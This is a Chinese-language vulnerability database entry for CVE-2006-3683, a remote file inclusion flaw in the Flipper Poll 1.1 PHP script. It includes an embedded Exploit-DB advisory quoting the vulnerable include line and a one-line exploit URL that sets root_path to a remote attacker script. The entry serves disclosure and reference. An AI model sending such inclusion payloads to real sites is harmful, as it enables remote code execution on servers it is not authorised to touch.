CVE-2006-3683
CVSS7.5
发布时间 :2006-07-21 10:03:00
修订时间 :2016-10-17 23:40:27
NMOE    

[原文]PHP remote file inclusion vulnerability in poll.php in Flipper Poll 1.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the root_path parameter.


[CNNVD]CNNVD数据暂缺。


[机译]PHP远程文件包含漏洞poll.php在翻转投票1.1和更早版本中通过URL在root_path参数,允许远程攻击者执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3683
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3683
(官方数据源) NVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=115031160401269&w=2
(UNKNOWN)  BUGTRAQ  20060614 Flipper Poll (root_path) Remote File Inclusion
http://packetstormsecurity.org/0606-exploits/flipper.txt
(UNKNOWN)  MISC  http://packetstormsecurity.org/0606-exploits/flipper.txt
http://securitytracker.com/id?1016489
(UNKNOWN)  SECTRACK  1016489
http://www.securityfocus.com/archive/1/archive/1/439971/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060713 Flipper Poll <= 1.1.0 Remote File Inclusion Vulnerability
http://www.securityfocus.com/bid/18461
(UNKNOWN)  BID  18461
http://www.vupen.com/english/advisories/2006/2353
(UNKNOWN)  VUPEN  ADV-2006-2353
http://xforce.iss.net/xforce/xfdb/27203
(UNKNOWN)  XF  flipperpoll-poll-file-include(27203)

- 漏洞信息 (3253)

Flipper Poll 1.1.0 (poll.php root_path) Remote File Include Vulnerability (EDBID:3253)
php webapps
2007-02-02 Verified
0 Mehmet Ince
N/A [点击下载]
Flipper Poll v1.1.0 (poll.php) remote file include vuln
---------------------------------------------------------------------------------
 
Found: Cyber-Security
cyber-security.org
 
---------------------------------------------------------------------------------
 
Script Download: http://sourceforge.net/project/showfiles.php?group_id=59828
 
---------------------------------------------------------------------------------

Vuln Code: include_once($root_path . 'config.php');
 
---------------------------------------------------------------------------------
 
Exploit: /poll.php?root_path=evilscripts?
 
---------------------------------------------------------------------------------
 
Reference: http://www.cyber-security.org/DataDetayAll.Asp?Data_id=596
 
---------------------------------------------------------------------------------

# milw0rm.com [2007-02-02]
		

- 漏洞信息

26503
Flipper Poll poll.php root_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Flipper Poll contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to poll.php not properly sanitizing user input supplied to the 'root_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-06-14 Unknow
2006-06-14 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站